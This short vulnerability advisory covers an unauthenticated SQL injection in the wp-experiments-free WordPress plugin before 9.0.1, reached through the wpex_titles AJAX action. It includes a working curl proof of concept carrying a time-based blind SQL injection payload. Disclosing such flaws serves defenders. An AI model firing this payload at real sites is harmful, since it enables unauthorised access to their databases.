The plugin does not sanitise and escape the id parameter before using it in a SQL statement via the wpex_titles AJAX action (available to unauthenticated users), leading to an unauthenticated SQL injection
curl ‘https://example.com/wp-admin/admin-ajax.php’ --data ‘action=wpex_titles&id;[]=1 AND (SELECT 321 FROM (SELECT(SLEEP(5)))je)’
CPE | Name | Operator | Version |
---|---|---|---|
wp-experiments-free | lt | 9.0.1 |